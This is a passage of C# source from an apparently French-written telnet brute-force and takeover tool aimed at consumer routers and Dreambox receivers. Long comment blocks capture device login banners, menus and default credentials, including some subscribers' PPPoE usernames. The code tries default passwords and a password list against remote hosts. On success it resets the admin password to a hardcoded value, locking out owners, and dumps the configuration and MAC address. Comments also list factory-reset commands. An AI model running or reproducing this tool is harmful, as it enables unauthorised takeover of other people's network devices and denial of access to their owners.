//32K bytes of non-volatile configuration memory.
//4096K bytes of processor board System flash (Read/Write)
//Configuration register is 0x2102
//GPBM>show diag
//Slot 0:
// C1720 1FE Mainboard Port adapter, 3 ports
// Port adapter is analyzed
// Port adapter insertion time unknown
// EEPROM contents at hardware discovery:
// Hardware Revision : 5.1
// PCB Serial Number : JAD04180989
// Part Number : 73-3201-05
// Board Revision : 70
// Fab Version : 04
// EEPROM format version 4
// EEPROM contents (hex):
// 0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
// 0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
// 0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
// 0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
// 0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
// 0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
// 0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
// 0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
// WIC Slot 0:
// Serial 1T WAN daughter card
// Hardware revision 1.0 Board revision H0
// Serial number 0018074153 Part number 800-01514-01
// Test history 0x00 RMA number 00-00-00
// Connector type WAN Module
// EEPROM format version 1
// EEPROM contents (hex):
// 0x20: 01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
// 0x30: 88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF
// WIC Slot 1:
// BRI S/T - 2186 WAN daughter card
// Hardware revision 1.3 Board revision A0
// Serial number 0019915070 Part number 800-01833-03
// Test history 0x00 RMA number 00-00-00
// Connector type WAN Module
// EEPROM format version 1
// EEPROM contents (hex):
// 0x20: 01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
// 0x30: 50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF
//************************************************************************************
//-----------------------------------------------------------------------
//Cisco Router and Security Device Manager (SDM) is installed on this device.
//This feature requires the one-time use of the username "cisco"
//with the password "cisco". The default username and password have a privilege le
//vel of 15.
//Please change these publicly known initial credentials using SDM or the IOS CLI.
//Here are the Cisco IOS commands.
//username <myuser> privilege 15 secret 0 <mypassword>
//no username cisco
//Replace <myuser> and <mypassword> with the username and password you want to use
//.
//For more information about SDM please follow the instructions in the QUICK START
//GUIDE for your router or go to http://www.cisco.com/go/sdm
//-----------------------------------------------------------------------
//User Access Verification
//Username: cisco
//Password:
//% Login invalid
//************************************************************************************
//BCM96338 ADSL Router
//Login: bad
//Password:
//Login incorrect. Try again.
//Login: admin
//Password: password
//Note: If you have problem with Backspace key, please make sure you configure you
//r terminal emulator settings. For instance, from HyperTerminal you would need to
// use File->Properties->Setting->Back Space key sends.
// Main Menu
//1. ADSL Link State
//2. LAN
//3. WAN
//4. DNS Server
//5. Route Setup
//6. NAT
//7. Firewall
//8. Quality Of Service
//9. Management
//10. Passwords
//11. Diag
//12. Reset to Default
//13. Save and Reboot
//14. Exit
// ->
//(10)
//Note: If you have problem with Backspace key, please make sure you configure you
//r terminal emulator settings. For instance, from HyperTerminal you would need to
// use File->Properties->Setting->Back Space key sends.
// Password Menu
//1. Admin
//2. User
//3. Support
//4. Exit
///Passwords ->
//Note: If you have problem with Backspace key, please make sure you configure you
//r terminal emulator settings. For instance, from HyperTerminal you would need to
// use File->Properties->Setting->Back Space key sends.
// Password Menu
//1. Admin
//2. User
//3. Support
//4. Exit
///Passwords -> 1
// Password Configuration Menu For User admin
//Note: Maximum length of password is 16 characters.
//Old password :
//New password :
//Confirm new password:
//Password for admin changed successfully.
//Hit <enter> to continue
//Note: If you have problem with Backspace key, please make sure you configure you
//r terminal emulator settings. For instance, from HyperTerminal you would need to
// use File->Properties->Setting->Back Space key sends.
// DNS Menu
//1. Configure
//2. Show
//3. Exit
/// DNS Server -> 2
//Automatic assigned IP address for DNS is enabled.
//Primary DNS : 62.251.229.237
//Secondary DNS: 62.251.229.223
//Hit <enter> to continue
//14. Exit
// -> 14
//Bye bye. Have a nice day!!!
//Perte de la connexion à l'hôte.
//************************************************************************************
//Password: 1234
// Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
// Prestige 650R-E1 Main Menu
// Prestige 645 Main Menu
//Getting Started Advanced Management
// 1. General Setup 21. Filter Set Configuration
// 3. LAN Setup 22. SNMP Configuration
// 4. Internet Access Setup 23. System Password
// 24. System Maintenance
//Advanced Applications 25. IP Routing Policy Setup
// 11. Remote Node Setup 26. Schedule Setup
// 12. Static Routing Setup
// 15. NAT Setup
// 99. Exit
// Enter Menu Selection Number:
//(23)
//
// Menu 23 - System Password
//Old Password= ?
//New Password= ?
//Retype to confirm= ?
// Enter here to CONFIRM or ESC to CANCEL:
//
// Menu 4 - Internet Access Setup
//ISP's Name= MyISP
//Encapsulation= PPPoE
//Multiplexing= LLC-based
//VPI #= 8
//VCI #= 35
//ATM QoS Type= UBR
// Peak Cell Rate (PCR)= 0
// Sustain Cell Rate (SCR)= 0
// Maximum Burst Size (MBS)= 0
//My Login= saidi_im
//My Password= ********
//Idle Timeout (sec)= 0
//IP Address Assignment= Dynamic
// IP Address= N/A
//Network Address Translation= SUA Only
// Address Mapping Set= N/A
//Press ENTER to Confirm or ESC to Cancel:
//************************************************************************************
//Password: 1234
// Copyright (c) 1994 - 2004 ZyXEL Communications Corp.
// Prestige 660HW-61 Main Menu
//Getting Started Advanced Management
// 1. General Setup 21. Filter Set Configuration
// 2. WAN Backup Setup 22. SNMP Configuration
// 3. LAN Setup 23. System Security
// 4. Internet Access Setup 24. System Maintenance
// 25. IP Routing Policy Setup
//Advanced Applications 26. Schedule Setup
// 11. Remote Node Setup
// 12. Static Routing Setup
// 14. Dial-in User Setup 99. Exit
// 15. NAT Setup
// Enter Menu Selection Number:
//(23)
//
// Menu 23 - System Security
//1. Change Password
//2. RADIUS Server
//4. IEEE802.1x
//(1)
//
//Menu 23.1 - System Security - Change Password
// Old Password= ?
// New Password= ?
// Retype to confirm= ?
// Enter here to CONFIRM or ESC to CANCEL:
// Enter Menu Selection Number:
//************************************************************************************
//(Cisco router)
//User Access Verification
//Username: bad
//Password:
//% Login invalid
//Username: admin
//Password:
//% Login invalid
//Username: admin
//Password:
//% Login invalid
//Perte de la connexion à l'hôte.
//************************************************************************************
//**************************
//* *
//* The Gemini Project *
//* *
//**************************
//welcome on your dreambox! - Kernel 2.6.9 (09:30:19).
//dreambox login: root
//Password:
//BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
//Enter 'help' for a list of built-in commands.
//root@dreambox:~>
//root@dreambox:~> help
//
//Built-in commands:
//-------------------
// . : alias bg break cd chdir command continue eval exec exit export
// false fg getopts hash help jobs kill let local pwd read readonly
// return set shift times trap true type ulimit umask unalias unset
// wait
//root@dreambox:~> passwd
//Changing password for root
//Enter the new password (minimum of 5, maximum of 8 characters)
//Please use a combination of upper and lower case letters and numbers.
//Enter new password:
//Re-enter new password:
//Password changed.
//root@dreambox:~>
//root@dreambox:~>
//\[ fusermount mkdir start-stop-daemon
//ash gbox mknod streampes
//automount gbox.ver mkswap streamripper
//awk gdaemon mmi.socket streamsec
//basename gdaemon.socket more streamts
//boot grep mount stty
//bunzip2 gunzip mv su
//busybox gzip nc swapoff
//bzcat halt netstat swapon
//cat hdparm nslookup sync
//chgrp head online.log syslogd
//chmod hostname passwd tail
//chown hotplug pid.info tar
//chroot hotplug.socket pidof telnet
//clear httpd ping telnetd
//cp id pmt.tmp test
//date ifconfig poweroff top
//dd in.ftpd prockill touch
//df in.telnetd ps true
//dmesg inadyn pwd tty
//dos2unix inetd rdate udhcpc
//dropbear init reboot udpstreampes
//dropbearkey insmod reset umount
//dropbearmulti kill rm uname
//du killall rmdir uniq
//dvbnet klogd rmmod unix2dos
//echo lcdoff route uptime
//enigma lcdstuff sc.info usleep
//enigmanet ln sc01.info vi
//env loadkmap scp wc
//eraseall logger sed wget
//etherwake login sh which
//expr logread showlogo whoami
//false losetup sleep xargs
//find ls smbmnt yes
//flashtool lsmod smbmount zcat
//free md5sum sort
//************************************************************************************
#endregion
if (banner.Contains("dreambox"))
{
//dreambox login:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
//Password:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
}
else
{ //Vulcan
//login:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
//password:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
}
// cisco/cisco
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
//Login Successful
//login:
if(stringdata.Contains("ogin:"))
{
Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
}
else
{
//$
//$passwd
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
if (banner.Contains("Vulcan"))
{
//Enter Old Password:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
}
else
{
//On a pas cette ligne sur une BusyBox ou une dreambox
}
//Enter New Password:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
//Confirm New Password:
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
//Login incorrect (dreambox)
//Password changed
//Set Done
//SINON: Erreur: Combinaison nom utilisateur/mot de passe invalide
//passwd: An error occurred updating the password file. //BusyBox
}
//login:
Sock_scan.Close();
}
if (banner.Contains("assword:"))
{
#region BANNERS
//********************************************************
//Info:Connection was denied by remote host according to ACL!
//********************************************************
//Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
//admin
//Valid commands are:
//sys exit ether wan
//ip bridge dot1q pktqos
//show set lan
//********************************************************
//Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
//1234
//Valid commands are:
//sys exit ether wan
//etherdbg usb ip bridge
//dot1q pktqos show set
//lan
//
//tc> sys countrycode
//country code = 253 //Djibouti
//********************************************************
// *******************
// Welcome to Vulcan
// *******************
//Conexant Inc., Software Release 3.C10MTT0.8822A
//Copyright (c) 2001-2003 by Conexant, Inc.
//login:
//admin
//password:
//admin
//Login Successful
//$
//$help
//Command Description
//------- -----------
//alias To Alias a command
//apply Apply configuration/image file
//commit Commit the active config to the flash
//create Create a new entry of specified type
//delete Delete the specified entry
//download Download a file on to the Device
//exit To exit the CLI shell
//get Display info for the search
//help Provides help
//list List files
//modify Modify information for specified entry
//passwd To modify user password
//ping The normal ping command
//prompt Change the user prompt
//reboot Reboot the device
//remove Remove file
//reset Reset info for the specified entry
//size ATM Sizing Information
//traceroute The normal traceroute command
//trigger To set trigger
//unalias To undefine previously defined alias
//verbose Switch ON/OFF the verbose mode
//********************************************************
//Password: 1234
//Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
//ras>
//ras> help
//Valid commands are:
//sys exit ether wan
//aux wlan ip ipsec
//bridge certificates bm lan
//vlan radius 8021x autoSec
//ras> sys
//packetscan adjtime callhist countrycode
//date domainname edit extraphnum
//feature firewall myZyxelCom hostname
//logs stdio datetime time
//tos trcdisp trclog trcpacket
//version view wdog romreset
//upnp atsh atmu ateb
//xmodemmode diag save display
//adminPassword userPassword default fwnotify
//tripleplay general socket filter
//ddns cpu winmes snmp
//ras> sys adminPassword
//Usage: adminPassword <new adminPassword>
//ras> sys adminPassword j3R0m3!!
/*
Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
Prestige 650R-E1 Main Menu
Getting Started Advanced Management
1. General Setup 21. Filter Set Configuration
3. LAN Setup 22. SNMP Configuration
4. Internet Access Setup 23. System Password
24. System Maintenance
Advanced Applications 25. IP Routing Policy Setup
11. Remote Node Setup 26. Schedule Setup
12. Static Routing Setup
15. NAT Setup
99. Exit
Enter Menu Selection Number:
*/
/*
Menu 1 - General Setup
System Name= ?
Location=
Contact Person's Name=
Domain Name=
Edit Dynamic DNS= No
Route IP= Yes
Bridge= No
Press ENTER to Confirm or ESC to Cancel:
*/
/*
Menu 23 - System Password
Old Password= ?
New Password= ?
Retype to confirm= ?
Enter here to CONFIRM or ESC to CANCEL:
*/
/*
Menu 3 - LAN Setup
1. LAN Port Filter Setup
2. TCP/IP and DHCP Setup
Enter Menu Selection Number:
*/
/*
Menu 3.1 - LAN Port Filter Setup
Input Filter Sets:
protocol filters=
device filters=
Output Filter Sets:
protocol filters=
device filters=
*/
/*
Menu 3.2 - TCP/IP and DHCP Setup
DHCP Setup
DHCP= Server
Client IP Pool Starting Address= 192.168.1.33
Size of Client IP Pool= 32
Primary DNS Server= 0.0.0.0
Secondary DNS Server= 0.0.0.0
Remote DHCP Server= N/A
TCP/IP Setup:
IP Address= 192.168.1.1
IP Subnet Mask= 255.255.255.0
RIP Direction= Both
Version= RIP-2B
Multicast= None
IP Policies=
Edit IP Alias= No
Press ENTER to Confirm or ESC to Cancel:
Press Space Bar to Toggle.
*/
/*
Menu 4 - Internet Access Setup
ISP's Name= MyISP
Encapsulation= PPPoE
Multiplexing= LLC-based
VPI #= 8
VCI #= 35
ATM QoS Type= UBR
Peak Cell Rate (PCR)= 0
Sustain Cell Rate (SCR)= 0
Maximum Burst Size (MBS)= 0
My Login= zemzem2
My Password= ********
Idle Timeout (sec)= 0
IP Address Assignment= Dynamic
IP Address= N/A
Network Address Translation= SUA Only
Address Mapping Set= N/A
Press ENTER to Confirm or ESC to Cancel:
*/
/*
Menu 11 - Remote Node Setup
1. MyISP (ISP, SUA)
2. ________
3. ________
4. ________
5. ________
6. ________
7. ________
8. ________
Enter Node # to Edit:
*/
/*
Menu 11.1 - Remote Node Profile
Rem Node Name= MyISP Route= IP
Active= Yes Bridge= No
Encapsulation= PPPoE Edit IP/Bridge= No
Multiplexing= LLC-based Edit ATM Options= No
Service Name= zyxel
Incoming: Telco Option:
Rem Login= Allocated Budget(min)= 0
Rem Password= ******** Period(hr)= 0
Outgoing: Schedule Sets=
My Login= zemzem2 Nailed-Up Connection= Yes
My Password= ******** Session Options:
Authen= CHAP/PAP Edit Filter Sets= No
Idle Timeout(sec)= N/A
Edit Traffic Redirect= No
Press ENTER to Confirm or ESC to Cancel:
*/
/*
Menu 21 - Filter Set Configuration
Filter Filter
Set # Comments Set # Comments
------ ----------------- ------ -----------------
1 _______________ 7 _______________
2 _______________ 8 _______________
3 _______________ 9 _______________
4 _______________ 10 _______________
5 _______________ 11 _______________
6 _______________ 12 _______________
Enter Filter Set Number to Configure= 0
Edit Comments= N/A
Press ENTER to Confirm or ESC to Cancel:
*/
/*
Menu 21.1 - Filter Rules Summary
# A Type Filter Rules M m n
- - ---- --------------------------------------------------------------- - - -
1 N
2 N
3 N
4 N
5 N
6 N
Enter Filter Rule Number (1-6) to Configure:
*/
/*
Menu 21.1.1 - TCP/IP Filter Rule
Filter #: 1,1
Filter Type= TCP/IP Filter Rule
Active= No
IP Protocol= 0 IP Source Route= No
Destination: IP Addr=
IP Mask=
Port #=
Port # Comp= None
Source: IP Addr=
IP Mask=
Port #=
Port # Comp= None
TCP Estab= N/A
More= No Log= None
Action Matched= Check Next Rule
Action Not Matched= Check Next Rule
Press ENTER to Confirm or ESC to Cancel:
ress Space Bar to Toggle.
*/
/*
Menu 22 - SNMP Configuration
SNMP:
Get Community= public
Set Community= public
Trusted Host= 0.0.0.0
Trap:
Community= public
Destination= 0.0.0.0
Press ENTER to Confirm or ESC to Cancel:
*/
/*
Menu 24 - System Maintenance
1. System Status
2. System Information and Console Port Speed
3. Log and Trace
4. Diagnostic
5. Backup Configuration
6. Restore Configuration
7. Upload Firmware
8. Command Interpreter Mode
9. Call Control
10. Time and Date Setting
11. Remote Management
Enter Menu Selection Number:
*/
/*
Enter Menu Selection Number: 8
Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
ras> help
Valid commands are:
sys exit ether wan
ip bridge
ras>
*/
/*
Menu 24.11 - Remote Management Control
TELNET Server:
Server Port = 23 Server Access = ALL
Secured Client IP = 0.0.0.0
FTP Server:
Server Port = 21 Server Access = ALL
Secured Client IP = 0.0.0.0
Web Server:
Server Port = 80 Server Access = ALL
Secured Client IP = 0.0.0.0
Press ENTER to Confirm or ESC to Cancel:
*/
//********************************************************
//**************************
//* *
//* The Gemini Project *
//* *
//**************************
//welcome on your dreambox! - Kernel 2.6.9 (17:51:55).
//dreambox login: admin
//Password:
//Login incorrect
//dreambox login:
//
//root/dreambox
//********************************************************
//***************************
//* *
//* The Gemini Project *
//* *
//***************************
//* Prepared By "drhg" *
//* ( Dream-Gaza Team ) *
//* www.dreamgaza.com *
//***************************
//Checking Kernel, Please Wait ....
//Kernel 2.6.9.
//md5sum (dreambox Linux ppc ).
//head.ko = 308509 bytes.
//Safe, NO 'clone bomb' found ... Congratulations.
//Enjoy Original Gemini Project without Time Bomb !.
//---------------------------------------------------
//(Friday, 17 September 2010).
//welcome on your dreambox! - Kernel 2.6.9 (10:46:22).
//dreambox login: bad
//Password:
//Login incorrect
//dreambox login: root
//Password:
//Login incorrect
//dreambox login: root
//Password:
//Login incorrect
//********************************************************
//OpenDreambox 1.5.0 dm800
//dm800 login:
//dm800 login: bad
//Password:
//Login incorrect
//dm800 login: root
//root@dm800:~#
//CCcam_2011 head pyhtmlizer
//StartNabCam hexdump python
//\[ hostname rdjpgcom
//addgroup hotplug readlink
//adduser id reboot
//ar ifconfig reboot.sysvinit
//arping ifdown renice
//ash ifup reset
//automount im rjoe
//avahi-daemon inadyn rm
//awk inadyn_script.sh rmdir
//basename inetd rmmod
//bdpoll init route
//bookify init.sysvinit rquotad
//bunzip2 insmod run-parts
//busybox ip runlevel
//bzcat ipkg rx
//cat ipkg-cl scp
//cftp ipkg-link sed
//chat iwconfig seq
//chgrp iwgetid sfdisk
//chmod iwlist sh
//chown iwpriv sha1sum
//chroot iwspy showiframe
//chvt jmacs showmount
//cjpeg joe shutdown
//ckeygen jpegtran shutdown.sysvinit
//clear jpico sleep
//conch jstar smartctl
//cp kill smartd
//cpio killall smbd
//crond killall5 sort
//crontab klogd ssh
//cut last start-stop-daemon
//czap last.sysvinit statd
//date lastb streamproxy
//dbclient ldconfig strings
//dbus-cleanup-sockets less stty
//dbus-daemon lessecho su
//dbus-launch lesskey sulogin
//dbus-monitor ln swapoff
//dbus-send loadfont swapon
//dbus-uuidgen loadkmap sync
//dc lockd sysctl
//dccamd logger syslogd
//dd login szap
//deallocvt logname t-im
//delgroup logread tail
//deluser lore tap2deb
//depmod losetup tap2rpm
//depmod.26 ls tapconvert
//df lsmod tar
//dirname mailmail tda1002x
//djpeg makedevs tee
//dmesg manhole telinit
//dos2unix map-mbone telnet
//dropbear mc telnetd
//dropbearconvert mcedit termidx
//dropbearkey mcmfmt test
//dropbearmulti mcview time
//du md5sum tkconch
//dumpkmap mesg top
//dvbsnoop mesg.sysvinit touch
//dvbtraffic mkdir tput
//e2fsck mke2fs tr
//echo mkfifo traceroute
//egrep mkfs.ext2 trial
//enigma2 mkfs.ext3 true
//enigma2.sh mknod tset
//env mkswap tty
//ethtool mktap tuxtxt
//exportfs mktemp twistd
//expr modprobe tzap
//false more udhcpc
//fbset mount umount
//fdisk mountd uname
//fdisk.util-linux mountpoint uniq
//femon mrinfo unix2dos
//fgrep mrouted unzip
//find mv update-alternatives
//free nc update-inetd
//fsck.ext2 netstat update-modules
//fsck.ext3 nfs_server_script.sh update-passwd
//ftpget nfsd update-rc.d
//ftpput nfsstat uptime
//getepgchannels nhfsgraph utmpdump
//getkey nhfsnums uudecode
//getty nhfsrun uuencode
//grab nhfsstone vi
//grep nmbd vlock
//gst-feedback nslookup vsftpd
//gst-feedback-0.10 od wall
//gst-inspect openvpn wall.sysvinit
//gst-inspect-0.10 openvpn_script.sh watch
//gst-launch openvt wc
//gst-launch-0.10 passwd wdog
//gst-typefind patch wget
//gst-typefind-0.10 pidof which
//gst-visualise-0.10 pidof.sysvinit who
//gst-xmlinspect ping whoami
//gst-xmlinspect-0.10 pivot_root wpa_cli
//gst-xmllaunch poff wpa_passphrase
//gst-xmllaunch-0.10 pon wpa_supplicant
//gunzip portmap wrjpgcom
//gzip poweroff xargs
//halt pppd yes
//halt.sysvinit printf zcat
//hddtemp ps zeroconf
//hdparm pwd
//root@dm800:~#
//root@dm800:~# passwd
//Changing password for root
//Enter the new password (minimum of 5, maximum of 8 characters)
//Please use a combination of upper and lower case letters and numbers.
//Enter new password:
//Re-enter new password:
//Password changed.
//root@dm800:~#
//********************************************************
//BusyBox on (none) login: bad
//Password:
//Login incorrect
//BusyBox on (none) login: admin
//Password:
//BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
//Enter 'help' for a list of built-in commands.
//# help
//Built-in commands:
//-------------------
// . : bg break builtin cd chdir continue eval exec exit export
// false fc fg hash help jobs kill local pwd read readonly return
// set setvar shift times trap true type ulimit umask unset wait
//********************************************************
//User Access Verification
//
//Password:
//Password:
//Password:
//% Bad passwords
//********************************************************
//Huawei Home Gateway 550
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//Login: bad
//Password:
//Login incorrect. Try again.
//Login: admin
//Password:
//Login incorrect. Try again.
//Login: admin
//Password:
//Authorization failed after trying 3 times!!!.
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//wl driver adapter not found
//Login:
#endregion
foreach (string password in passwords)
{
Thread.Sleep(100);
try
{
Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
Sock_scan.Connect(ip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
// Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);
//Console.WriteLine("DEBUG Trying Password:{0}", password);
//Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
/*
Byte[] smk = new Byte[password.Length];
for (int i = 0; i < password.Length; i++)
{
Byte ss = Convert.ToByte(password[i]);
smk[i] = ss;
}
Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
*/
//Thread.Sleep(100);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
//Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
if (stringdata == "")
{
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
}
//stringdata = null;
//bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
//stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
//Console.WriteLine("Response telnet: " + strRetPage);
//while (bytes > 0)
//{
// bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
// stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
// Console.WriteLine("Response telnet: " + strRetPage);
//}
//Bad Password!!!
if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password")) //stringdata.Contains("*")
{
// Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
Sock_scan.Close();
}
else
{
Console.WriteLine("***********************************************************");
Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
Console.WriteLine("***********************************************************");
if(stringdata.Contains("ZyXEL")) //1234
{
if (stringdata.Contains("Menu")) //1234
{
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
// Menu 23 - System Password
//Old Password= ?
//New Password= ?
//Retype to confirm= ?
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
//(Saving to ROM...)
//Retour menu
}
else
{
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
}
}
else
{
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
//save ok, new password is: j3R0m3!!.
////Exemple: Vulcan
////Erreur: Commande Invalide
////$passwd
//Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
////Enter Old Password:
//Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
////Enter New Password:
//Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
////Confirm New Password:
//Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
////Set Done
////SINON: Erreur: Combinaison nom dÆutilisateur/mot de passe invalide
}
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
//***************
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None); //for MAC address
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
/*
D-Link DSL 526B >restoredefault
Huawei SmartAX MT882a >sys romreset
TP-Link TD-8817 >sys romreset
*/
//***************
//For MT882A
/*
MT882a> ether config
